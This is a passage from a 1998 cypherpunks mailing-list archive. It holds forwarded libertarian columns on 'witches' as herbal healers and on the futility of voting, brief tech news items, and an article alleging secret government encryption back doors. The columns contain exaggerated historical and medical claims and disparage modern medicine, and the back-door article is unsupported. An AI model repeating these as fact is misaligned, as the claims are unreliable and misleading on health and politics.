revelations from the gods which really delivered the goods -- hardly fair
competition for the modest little Spanish communion wafer.

  Why did the conquistadors relate such practices to the witches back home?
Because the witches, too, in a triumph of empirical science (Northern
Europe has no reliably safe natural hallucinogens), had found ways to turn
such normally deadly poisons as henbane, monkshood, and belladonna into an
externally-applied ointment which would promote religious revelation by
inducing a sensation of flying, followed by ecstatic visions.

  (The stuff worked best when applied to the mucous membranes with a smooth
wooden rod or staff -- the "witch's broomstick" of our modern Halloween.)

  This was the great evil of the witches, and the justification for
destroying millennia of the (start ital)materia medica(end ital) which they
had gathered -- the traditional folk knowledge of medicinal plants which
was largely destroyed with the Wise Women of 16th and 17th century Europe,
and which we are only painfully piecing together again today.


    #  #  #

    It's commonly held that this order of midwives and herbal healers were
a superstitious lot, rejecting the more "scientific" advances of the
academically trained doctors of their time.

  The truth is just the opposite. What could be more scientific than
carefully observing and noting the effects of medicinal herbs over a period
of generations? What could be a more superstitious pile of nonsense than
the theories of the 2nd century quack Galen, whose theory that health is
dominated by the "four humours" remained gospel for centuries, refined with
the addition of harsh purgatives and the exquisite nonsense of
blood-letting?

  So fatal was the standard practice of medicine in the centuries after the
witches were eliminated that most leading statesmen of the time -- George
Washington included -- died while being bled by doctors. (Washington woke
up with a sore throat at the age of 67, and died within 48 hours after
receiving a cathartic enema, being dosed with poisonous mercury and
antimony, and having literally half his blood -- four pints -- drained from
his body, all in keeping with the best medical advice of the day.)

  All three of Louis XVI's elder brothers were killed by the blood-letting
of physicians during youthful illnesses. The last direct heir to the
Bourbon throne was preserved only after the queen mother bundled him away
to a locked room and refused on pain of death to let any of the court
physicians have at him.

  Superstition? Ask most modern patients whether they would rather be
injected with a purified white extract, or swallow a tea made from the same
herb, and see whether there isn't a "superstitious" preference for the
power of the magic syringe or even for surgery over the remedy in its
naturally-occurring form, even when the latter offers better control of
dosage and side effects. Chew up a bunch of bug-eaten leaves? How
primitive!

  The ancient Egyptians were fighting infection with fruit molds as early
as the date of the Ebers papyrus, but thousands had to die of pneumonia,
puerperal fever and meningitis, all through the late Middle Ages and right
through the 19th century, before Fleming could get anyone to take another
look at penicillin. It was with similar reluctance -- and not until 1795,
when Napoleon seemed likely to put them all out of business unless they got
practical in a hurry -- that the established brotherhood of "scientific"
physicians finally acknowledged that the "old wives' remedy," lemon juice,
was a better cure for naval scurvy than all their acids and caustic salts
put together.


    #  #  #

    This is the tradition of ignorance, intolerance, and futility which we
honor when we dress up our children to ridicule warty old witches, or when
we protest (as parents groups in Le Mesa, Calif. and elsewhere continue to
do every year) that Roald Dahls' book "The Witches" should be banned from
school libraries because it "portrays witches as ordinary-looking women."

  Only the dimming effects of time -- and the fact that the Inquisition
pretty much got them all -- render this outrage acceptable. To find a
modern parallel, imagine the (fully appropriate) public outcry if it were
discovered that some small town in Bavaria, from which for some undisclosed
reason all the Jewish families disappeared in 1942, had since decided to
launch a new Halloween custom, in which many of the town's blonde-haired
little children were dressed up in yarmulkes and artificially large beaked
noses, and sent out to play pranks and demand loot under the guise of being
"nasty little Jews." Imagine further that the more religious local townfolk
demanded the removal of certain children's books from the local library,
because they depicted Jews as "people or ordinary human appearance."

  A healthy skepticism about many of our modern-day "witches" and some of
their New Age mumbo jumbo may be in order ... though surely it's not up to
us to choose which of their exotic notions it's "acceptable" to explore.

  But shall we extend our inherited intolerance to the many serious
researchers now trying to rediscover the healing properties of plants, to
overcome centuries of medical libel designed to convince us that
mild-mannered natural remedies which can take weeks to rebuild our
immunities are not worth our time, that the only valuable medicines are
purified (and thus patentable) toxins that kill "bad" cells in a test tube,
no matter how much damage they cause the "host organism" in the process?

  Excepting the odd mountain hamlet in Gwynedd, the Tirol, and the
Hebrides, our direct links to the Wise Women of old are probably lost for
good. But rediscovering their worldview, a beneficent vision of humankind
inextricably balanced in nature's mandala, is a journey well worth
beginning anew -- perhaps even on the night of the Samhain moon.


    #  #  #

Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin@lvrj.com. The web
sites for the Suprynowicz column are at
http://www.infomagic.com/liberty/vinyard.htm, and
http://www.nguworld.com/vindex/. Watch for Vin's book, "Send in the Waco
Killers," coming from Huntington Press in February, 1999. The column is
syndicated in the United States and Canada via Mountain Media Syndications,
P.O. Box 4422, Las Vegas Nev. 89127.

***



Vin Suprynowicz,   vin@lvrj.com

The evils of tyranny are rarely seen but by him who resists it. -- John
Hay, 1872

The most difficult struggle of all is the one within ourselves. Let us not
get accustomed and adjusted to these conditions. The one who adjusts ceases
to discriminate between good and evil.  He becomes a slave in body and
soul. Whatever may happen to you, remember always: Don't adjust! Revolt
against the reality! -- Mordechai Anielewicz, Warsaw, 1943

* * *

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 27 Oct 1998 23:13:02 +0800
To: cypherpunks@cyberpass.net
Subject: Oct. 29 column -- twilight of an era
Message-ID: <v04020a35b25b702b310c@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Mon, 26 Oct 1998 23:21:30 -0700
Date: Mon, 26 Oct 1998 22:13:20 -0800 (PST)
X-Sender: vin@dali.lvrj.com
Mime-Version: 1.0
To: vinsends@ezlink.com
From: Vin_Suprynowicz@lvrj.com (Vin Suprynowicz)
Subject: Oct. 29 column -- twilight of an era
Resent-From: vinsends@ezlink.com
X-Mailing-List: <vinsends@ezlink.com> archive/latest/578
X-Loop: vinsends@ezlink.com
Precedence: list
Resent-Sender: vinsends-request@ezlink.com


    FROM MOUNTAIN MEDIA
    FOR IMMEDIATE RELEASE DATED OCT. 29, 1998
    THE LIBERTARIAN, By Vin Suprynowicz
    Twilight of the Gods

    We seem to be entering the twilight of an era.

 Changes in our society -- consider the erosion of personal liberties, and
even the notion that sticking up for our personal liberties is a good thing
("He wouldn't give his Social Security number when he tried to register to
vote? He owned an unregistered firearm? He wouldn't volunteer any
information on his tax form? Then he deserved whatever happened to him. I'm
sorry they burned up the wife and baby, too, but he brought it on himself")
-- have been occurring incrementally over the past 86 years. Hence, the
popular notion that future change will continue to be equally gradual.

  Even "legitimate" Libertarian Party political candidates now patiently
explain to me that since the current police/welfare state took 60 to 90
years to put in place, there's no sense alarming anyone by shouting radical
ideas about legalizing heroin or machine guns. No, no. These "modern"
Libertarians -- respectable middle-aged entrepreneurs in respectable coats
and striped ties  -- patiently explain that they only wish to move us back
toward slightly less government, slightly lower taxes, and the restoration
of a few personal liberties at a time. Nothing for anyone to get frightened
about.

  The problem is, neither human nor geologic history seem to bear out this
notion of a pendulum swinging steadily back and forth. The era of the
swamp-dwelling dinosaurs seems to have continued for hundreds of thousands
of years without much change. But ice core samples and ocean sediments now
indicate the freeze that killed them may have taken as few as five years.

  Social and political change in France was pretty gradual from 1480 to
1780. Would one thus have been safe in assuming that things wouldn't be
likely to change much from 1780 and 1795? A whole lot of folks went to the
guillotine based on that assumption.

  Our ability to sense the imminent end of an era is seriously hampered by
a part of human nature modern psychiatry calls "denial." The loss of
familiar things -- even if we know in our hearts they are rotten -- is
frightening. Thus, we tend to hope the signs are wrong, and to cling to
what is familiar.

  Is this another one of these rants about how the inability of our
computers to process the date "2000" is going to cause an instant reversion
to the Stone Age?

  No -- though such computer malfunctions and shutdowns certainly will
occur, creating pockets of panic and accelerated uncertainty about just how
reliable our "foolproof" government and economic "systems" really are.

  But the number of things that are rotten in America -- and thus in
"Western civilization" -- has simply grown too large. And as each one
fails, it will help to pull down the next. Large dams do not develop small
leaks.

  We could talk about the imminent collapse of the largest, most
profligate, most unproductive and socially poisonous make-work social
engineering scheme ever devised, the mandatory government youth propaganda
camps (you may call them "public schools.") When the cost of things that
don't work exceeds what people can pay, they just walk away. That's why the
stone temples of the Maya were abandoned long before Cortez showed up, and
why most of the nuclear submarines of the Russian Navy now sit rusting at
their piers. There was never any popular vote to "shut down the Soviet
Navy." Everyone just went home.

  We could talk about the inevitable failure of the little Dutch boy
sticking his fingers in the financial dikes of Mexico, Russia, Indonesia,
Malaysia, Thailand, and Brazil -- the International Monetary Fund, the
failure of which is likely to soon bring down another 20th century
institution which we have come to assume could never fail, the vast
leveraged Ponzi scheme known as "government chartered fractional reserve
banking."

  (Imagine an evil wizard made the stock market disappear, along with your
stockbroker and your bank. For awhile, you might wonder what you would live
on in your "retirement." Then it would dawn on you: What "retirement"?
"Retirement" at a fixed age was a notion introduced by the 19th century
socialists, who believed there was a fixed number of jobs in the world
(duh), and that the only way to guarantee work to the young was therefore
to "pension off" the oldsters. "Retirement" is a completely artificial
invention.)

  I could talk about the schools or the banks, scrambling around insisting
it's not their fault; it's our fault for being too "greedy" to hand them
ever-larger "bailouts."

  But I won't. Instead, since it's election time, I will talk about why the
great experiment called "participatory democracy" is failing.

  Next time -- interviews with virtually every candidate in Southern Nevada
produced five or six outstanding prospects this year: Why voting for them
isn't likely to make a bit of difference.


Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin@lvrj.com. The web
sites for the Suprynowicz column are at
http://www.infomagic.com/liberty/vinyard.htm, and
http://www.nguworld.com/vindex/. The column is syndicated in the United
States and Canada via Mountain Media Syndications, P.O. Box 4422, Las Vegas
Nev. 89127.

***



Vin Suprynowicz,   vin@lvrj.com

The evils of tyranny are rarely seen but by him who resists it. -- John
Hay, 1872

The most difficult struggle of all is the one within ourselves. Let us not
get accustomed and adjusted to these conditions. The one who adjusts ceases
to discriminate between good and evil.  He becomes a slave in body and
soul. Whatever may happen to you, remember always: Don't adjust! Revolt
against the reality! -- Mordechai Anielewicz, Warsaw, 1943

* * *

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 27 Oct 1998 22:48:28 +0800
To: cypherpunks@cyberpass.net
Subject: Oct. 30 column -- playing out the clock
Message-ID: <v04020a36b25b71236b3b@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Mon, 26 Oct 1998 23:24:55 -0700
Date: Mon, 26 Oct 1998 22:16:50 -0800 (PST)
X-Sender: vin@dali.lvrj.com
Mime-Version: 1.0
To: vinsends@ezlink.com
From: Vin_Suprynowicz@lvrj.com (Vin Suprynowicz)
Subject: Oct. 30 column -- playing out the clock
Resent-From: vinsends@ezlink.com
X-Mailing-List: <vinsends@ezlink.com> archive/latest/579
X-Loop: vinsends@ezlink.com
Precedence: list
Resent-Sender: vinsends-request@ezlink.com


    FROM MOUNTAIN MEDIA
    FOR IMMEDIATE RELEASE DATED OCT. 30, 1998
    THE LIBERTARIAN, By Vin Suprynowicz
    Gamely playing out the clock in a hopeless contest


    Every even-numbered year, literally scores of candidates come trooping
through the offices of the newspaper where I work, seeking our endorsement
for every office from constable or justice of the peace, to governor or
U.S. senator.

  Playing out the game by the established rules, we cross-question them on
their little memorized spiels about how they "respect the Second Amendment"
and "want to make government more efficient and more responsive to the
people's needs."

  By and large, those candidates who start out insisting they "respect the
Second Amendment" will quickly agree with any new hare-brained scheme you
can propose to register or restrict where folks can carry guns, or to ban
people from owning "really dangerous" semi-automatic weapons or concealable
handguns, for which "obviously no one can have a legitimate use."

  (Uzis seem to be a favorite weapon for which "no one can have a
legitimate use" this year. The only ones available in local gun shops are
semi-autos, of course -- essentially a 9mm handgun with a shoulder stock.)

  Naturally, those who "want to make government more efficient" can rarely
name a single government office or program they'd close.

  But every year, a few candidates show up who actually understand a little
economics, have read the Constitution, and volunteer that the purpose of
government is to protect individual rights.

  Pinching ourselves and wondering how they "slipped through," every year
we celebrate these few brave souls in our editorial pages. Many people vote
for them. And then what happens? Taxes go up, more laws are passed,
government grows more intrusive, and our rights are eroded faster than
ever.

  How come?

  Well, of course, not all the candidates we endorse get elected. A certain
number of incumbent redistributionists are "automatically" returned by the
voters, no matter what we say or do.

  Fine: A newspaper has no dictatorial powers, nor should it.

  But what's more discouraging is how little difference these
well-intentioned people seem to make even if they do get elected to the
state legislature, or the Congress, or wherever they're headed.

  I've been in the newspaper business for 25 years. Call me a cynic -- I'll
respond that it's simply an objective observation: No matter who we elect,
it doesn't matter any more. Government is a machine that crunches anyone
you send into it into a cog or gear of the required shape and size to keep
the machine running and growing.

  Why are fewer and fewer folks registering to vote, or showing up at the
polls? Vote for the most radical of Libertarians, he will get 4 percent of
the vote, and nothing will change. They still won't let him into the TV
debates next year, and no corporation will hand him the protection money
which we still daintily call "campaign contributions."

  Vote for (start ital)and elect(end ital) the most radical-sounding "less
government" Republican you can find, and the best result will be a
government that grows at the rate of 7 percent next year, instead of 8
percent. You will still have to get fingerprinted to obtain your new
driver's license, there will still be armed soldiers at the airports
strip-searching people "to prevent terrorism and drug-running" (starting
next year), and your take-home pay will still be a smaller percentage of
your gross earnings next year than it was last year.

  Oh, these things are never accomplished overnight, say the eternal
optimists. Besides, these are all just a bunch of cynical generalities.

  OK: Let's get specific. in my next column, I will present you with five
or six races in which the Las Vegas Review-Journal -- largest newspaper in
Nevada -- has made loud, strident, forceful endorsements in Election '98.
The five or six candidates the newspaper endorsed may astound you with just
how dedicated to personal liberties and limited government they sound,
given that they are all "electable" (that is to say -- from one of the
"major parties.")

  But if each voter could personally interview every candidate on his or
her Nov. 3 ballot for half-an-hour apiece, not allowing them to get away
with any slick double-talk, I daresay you too could find and vote for five
or six "viable" candidates in your own town and state who sound just as
"libertarian."

  Then you too could have the experience of seeing them go to the capital
and vote for new tax hikes and more gun control laws, vote to send away
harmless minority kids for even longer terms in the pen for "getting high"
on harmless vegetable extracts, authorize more restrictions of our economic
freedom and invasions of our privacy, and then give you a look of shock
when you tell them you're disappointed.

  "But that bill had some good stuff in it!" they will insist. "No bill is
perfect. You always have to compromise on something to get things done. We
had to make our gun licensing rules just a little stricter, in the hopes
our permits will now be recognized by other states. And as for the
fingerprinting for the new driver's license, most people favor that, since
it will make it much harder for someone else to cash your checks if they're
stolen."

  Next time: five excellent and "viable" candidates, and why voting for
them probably won't make a bit of difference at all.


Vin Suprynowicz is the assistant editorial page editor of the Las Vegas
Review-Journal. Readers may contact him via e-mail at vin@lvrj.com.

***




Vin Suprynowicz,   vin@lvrj.com

The evils of tyranny are rarely seen but by him who resists it. -- John
Hay, 1872

The most difficult struggle of all is the one within ourselves. Let us not
get accustomed and adjusted to these conditions. The one who adjusts ceases
to discriminate between good and evil.  He becomes a slave in body and
soul. Whatever may happen to you, remember always: Don't adjust! Revolt
against the reality! -- Mordechai Anielewicz, Warsaw, 1943

* * *

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 27 Oct 1998 22:50:06 +0800
To: cryptography@c2.net
Subject: SNET: [FP] Microsoft puts smart card on table
Message-ID: <v04020a38b25b76249861@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Sender: st005940@brandywine.otago.ac.nz
Mime-Version: 1.0
Date: Tue, 27 Oct 1998 16:08:19 +1300
To: snetnews@world.std.com
From: "ScanThisNews" <mcdonalds@airnet.net> (by way of
 jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton))
Subject: SNET: [FP] Microsoft puts smart card on table
Sender: snetnews-approval@world.std.com
Precedence: list
Reply-To: snetnews@world.std.com


->  SNETNEWS  Mailing List

======================================================================
SCAN THIS NEWS
10/26/98


Microsoft puts smart card on table

http://www.news.com/News/Item/0%2C4%2C27923%2C00.html?dd.ne.tx.fs6.1026

By Tim Clark
Staff Writer, CNET News.com
October 26, 1998

Update: Microsoft tomorrow will announce an extension of its Windows
operating system for smart cards, a company spokesman said today.

Smart cards, which have very limited memory and processing power, are about
the size of a credit card and embedded with a computer chip. The technology
is used for storing data on mobile phones, banking online, and paying for
phone calls and public transit fares.

Microsoft vice president Paul Maritz is scheduled to announce the operating
system initiative tomorrow at Cartes 98, a conference on smart card
technology in Paris.

A new system from Microsoft could bring more acceptance of smart cards in
the United States. Smart cards have been used in Europe, which holds more
than 80 percent of the market, but have been slow to progress in America, at
least in part beacuse of the lack of a standard operating system.

Microsoft is bidding to enter that arena, but Sun Microsystems is already
active in that space with its JavaCard specification. In addition, Mondex,
an e-cash company controlled by MasterCard has its MultOS system designed so
cards with different operating systems can work together.

The company's interest in smart cards parallels its strategy with Windows
CE, a stripped-down version of its PC operating system for consumer
electronics devices. In April, Microsoft announced a version of Windows CE
for automobiles, gas pumps, industrial controllers, and other uses.

The smart-card initiative seeks to go after even smaller, cheaper
devices--particularly when rival Sun is targeting the same business. The
Microsoft spokesman said card developers could use existing Windows tools to
work with their software.

The annual Paris show is a major showcase for the smart card industry.
Schlumberger, a major French manufacturer of smart cards, today unveiled new
software for its cards that transforms a smart card into a security device
to identify its holder.

Many PC makers have said they will produce machines with smart-card readers
built in, a capability that Microsoft has provided in its desktop PC
operating systems. Microsoft has a certification and logo program that
indicates smart card systems work with Windows NT.

=======================================================================
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================



-> Send "subscribe   snetnews " to majordomo@world.std.com
->  Posted by: "ScanThisNews" <mcdonalds@airnet.net> (by way of
jeremy.compton@stonebow.otago.ac.nz (Jeremy Compton))

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 27 Oct 1998 22:42:30 +0800
To: cypherpunks@cyberpass.net
Subject: Moore is Moore
Message-ID: <v04020a3cb25b7bace557@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Tue, 27 Oct 1998 05:38:30 -0600
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Atomic Chip
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

 Tuesday 27 Oct, 1998

   NOW - THE ATOMIC CHIP

     Scientists at the Technical University of Denmark said today they have
created an atom-sized computer chip, in which a single hydrogen atom
jumping to and fro generates a binary code. And the technique operates at
room temperatures. It means a million CDs could fit onto one disc. But it
is not expected to become commercial for some years. The university's
Microelectronics Centre, which carried out the research, is at
http://www.mic.dtu.dk



****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 27 Oct 1998 22:41:50 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Look Who's Minding The Store
Message-ID: <v04020a3db25b7bf3f614@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
Date: Tue, 27 Oct 1998 05:13:01 -0500 (EST)
To: ignition-point@majordomo.pobox.com
From: softwar@us.net (CharlesSmith)
Subject: IP: Look Who's Minding The Store
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: softwar@us.net (CharlesSmith)

http://www.worldnetdaily.com/smith/981027_cs_look_whos_mindi.shtml

William Reinsch is the Under Secretary for Export Administration
(BXA) from the U.S. Commerce Department.  Mr. Reinsch has been
with the Commerce Department since 1994, starting his service
under Ron Brown.  As head of BXA, Reinsch is charged with
administering and enforcing American high-tech export control
policies and anti-boycott laws.

Reinsch controls billions of dollars in American technology
exports from his position at BXA.  For example, Reinsch controls
high-speed computers, advanced secure communications systems and
encryption software.  According to the Commerce Department,
Reinsch's job also includes helping "Russia and other newly
emerging nations develop effective export controls systems and
convert their defense industries to civilian production."

Interestingly, Mr. Reinsch has zero experience in either
technical matters or military affairs.  Reinsch's only
qualification is that he was an aide to Senator Rockefeller and
former Senator Heniz.  This is quite unusual for a person
charged with such an export job involving the international
"defense" industry.

According to the Commerce Department, Reinsch's only business
experience consists of "President of the Saint Mark Elderly
Housing Corporation."  It is certain that Reinsch's business
experience running rental housing for the aged has little
application toward the export of advanced defense related
equipment to Russia and China such as super-computers.  Yet,
during Mr. Reinsch's tenure a wide range of advanced technology
has been shipped outright to China, India and Russia.

I once had the opportunity to ask Mr. Reinsch about one specific
transfer he worked on in 1995 for Loral.  According to Commerce
documentation, Mr. Reinsch exchanged a series of highly
classified memos with Commerce lawyer Bettie Baca on the export
of Loral GLOBALSTAR satellites to be launched by the Russians.
President Clinton signed the waiver for Loral to launch from the
former Soviet Union in July 1996.  Clinton's waiver included the
transfer of encrypted telemetry control systems to China for the
GLOBALSTAR satellites.

I cornered Bill Reinsch in April 1998 at the Rayburn
Congressional office building after a conference on President
Clinton's encryption policy.  At first, Mr. Reinsch claimed he
did not author the documents on Loral satellite exports.  I then
presented an official list of items from the U.S. Commerce
Department that showed he indeed did author the 1995 Loral
memos.  At this point Reinsch's face went pale and he ran from
the room.

I gave chase, demanding answers with tape recorder in hand,
attracting the attention of several dozen Congressional staffers
and a select few from the press as witnesses.  Reinsch, however,
was faster.  He pushed past the crowded entrance and dashed down
the Congressional hallway, running in full stride in his
three-piece suit.  Since then, Mr. Reinsch has refused all
requests for an interview.

Until recently, Reinsch controlled commercial satellite exports.
President Clinton passed the authority to control satellite
exports to the Commerce Department by executive order in 1996.
Republican legislation signed by President Clinton in October
1998 puts that authority back to the State Department and the
Defense Department.

Another example of Mr. Reinsch and his experience with the
defense industry through elderly housing is the export of high
speed computers to Russian and Chinese nuclear weapons labs.  In
1995 Bill Reinsch wrote a memo to Ron Brown detailing a secret
meeting with a group of computer CEOs, consisting of Apple,
AT&T, Compaq, Cray, Silicon Graphics, Digital Equipment
Corporation, Tandem, Sun and Unisys.  The group is called the
CSPP or Computer Systems Policy Project.

CSPP computer executives have backed Clinton since 1992 with big
bucks.  For example, Apple's chairman John Schully is a major
donor to the Clinton campaigns and a long time supporter.

In 1995 the CSPP lobby group was led by Ken Kay, an employee of
Tony Podesta, the brother of White House advisor John Podesta.
John Podesta is now Clinton's Chief of Staff.  In 1995, John
Podesta worked at the White House running encryption and super
computer policy.  During the same period of time, the CSPP and
Clinton officials began a series of classified briefings on
encryption and super computer export policy.

In 1995 IBM and Silicon Graphics sold super-computers directly
to Russian Atomic weapon labs.  IBM has since been fined $8.5
million on the $7 million sale.  In fact, Commerce spokesman
Eugene Cotilli pointed out in October 1998 that the Commerce
Department investigation led to the conviction.

Of course, Commerce did not start investigating until the
Russian minister in charge of MINATOM (Ministry of Atomics)
announced publicly the U.S. computers would be used for nuclear
weapons research.  Cotilli also did not deny that there is NO
investigation of CSPP member Silicon Graphics and their sale of
four super computers to Russian nuclear engineers at the
Chelyabinsk-70 weapons lab in the fall of 1996.  Thus, while IBM
is convicted - Clinton supporter and Podesta associate client
Silicon Graphics remains uninvestigated.

In 1998, White House Special Counsel to the President Michael B.
Waitzkin wrote "In January 1997, Mr. Podesta resigned his
part-time position at Podesta Associates and returned to the
White House as Deputy Chief of Staff.  Mr. Podesta was requested
by Senior Administration Officials to undertake certain
responsibilities with respect to encryption policy.  He did not,
however, undertake these responsibilities until he received
specific approval from the White House Counsel's Office with
respect to his involvement in these matters."

Thus, Mr. Podesta sought and obtained approval for his conflict
of interest in 1997.  Whether John and Tony Podesta shared a
conflict of interest in 1995 has so far remained unresolved but
not uninvestigated.  House investigators in the Cox/Dix
committee and on the House National Security Committee have
sought information on the CSPP and John Podesta.  Mr. John
Podesta refuses to be interviewed.

The fact is, Podesta Associate employee Ken Kay made thousands
of dollars in donations to the DNC in 1994 and 1995.  Yet,
according to CSPP lawyer C. Boyden Gray, Ken Kay only donated
$2,500 of which $1,250 was returned by the DNC in the form of a
painting.  According to official Federal Election Commission
records, none of Mr. Kay's donations totaled to $2,500 or
$1,250.  Mr. Kay also will not respond to interview requests.

The CSPP is, in part, still funded by the taxpayer.  The CSPP is
now helping the Clinton administration design the next
generation internet and getting paid to do it.  Obviously, many
of the CSPP members will benefit financially as each new
Internet contract is offered and they sell more equipment.

In 1998 CSPP lawyer C. Boyden Gray claimed that official Clinton
secret meetings began in November 1995.  Reinsch, however,
clearly wrote to Ron Brown about an earlier secret meeting in
June of 1995, when Tony Podesta employed Ken Kay and John
Podesta was charged with computer oversight policy.

The materials given to CSPP members at the White House on
encryption are considered so sensitive that they have no public
classification level such as secret or top secret.  The true
secrets of Clinton's encryption policy involve hidden back doors
and exploitable features built into computer products.  The
secrets given to CSPP members involved classified means of
electronic surveillance to be built inside domestic products by
the manufacturers.

The Clinton administration offered billions of tax dollars as
incentive to bug every fax, phone and computer built.  Clinton
offered military chip designs backed by decades of cold war
research.  The CSPP was given access to military algorithms and
taxpayer funded programs as incentives to adopt a secret
"back-door" concept for computers and communications.  William
Reinsch, John Podesta, Ken Kay and the DNC all refuse to comment
on Bill Clinton's secret project to bug America and the world.

===================================================================

William Reinsch & CSPP Source Document index -

http://www.softwar.net/reinsch.html

================================================================
1 if by land, 2 if by sea.  Paul Revere - encryption 1775
Charles R. Smith
SOFTWAR         http://www.softwar.net      softwar@softwar.net
Pcyphered SIGNATURE:
3B7CB41BBBE190B12082FA2032662C126449AADEFF70F107EFB810A50A8E6892
2EFAA5B363ABEB33D85F23BCBE60C4416359D229F36E4703348090FDC45794FC
7C2CC1D8D72F6184
================================================================
SOFTWAR EMAIL NEWSLETTER                            10/27/1998
***  to unsubscribe reply with "unsubscribe" as subject    ***
================================================================




****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Tue, 27 Oct 1998 18:06:18 +0800
To: David Honig <honig@sprynet.com>
Subject: Re: PRNGs and testers.
In-Reply-To: <19981021151835.A26267@krdl.org.sg>
Message-ID: <36359051.574632A8@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



David Honig wrote:
> 
> At 09:47 AM 10/26/98 +0100, Mok-Kong Shen wrote:

> >What if some PRNGs pass Maurer's test?

> I'd find it surprising if any did, given what I described.

I believe that there are quite a number. If I am allowed to cite 
my own stuff, a PRNG of my design did pass Maurer's test. See

     http://www.stud.uni-muenchen.de/~mok-kong.shen/#paper1
and
     http://www.stud.uni-muenchen.de/~mok-kong.shen/#paper9

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dporter@denova.com (D. Porter)
Date: Wed, 28 Oct 1998 01:44:23 +0800
To: vin@shore.net (Vin McLellan)
Subject: Re: files (was: Re: dbts, etc.)
Message-ID: <199810271107.39975@denova.com>
MIME-Version: 1.0
Content-Type: text/plain



Steve Bellovin (smb@research.att.com) wrote...

 >  . . . to trace the the perturbations caused to the system. . .
 > The more anonymity, and the more privacy cut-outs, the
 > harder this is. . .
 > To be sure, one can assert that the philosophical
 > gains -- privacy, libertarianism, what have you -- are
 > sufficiently important that this price is worth paying. . .

Steve, as you point out most of us are driven primarily by practical
concerns. This is a philosophy: pragmatism. Beyond mind exercise,
philosophy is valuable exactly to the extent it is practical.

DBS increases freedom. Increased freedom is practical because it reduces
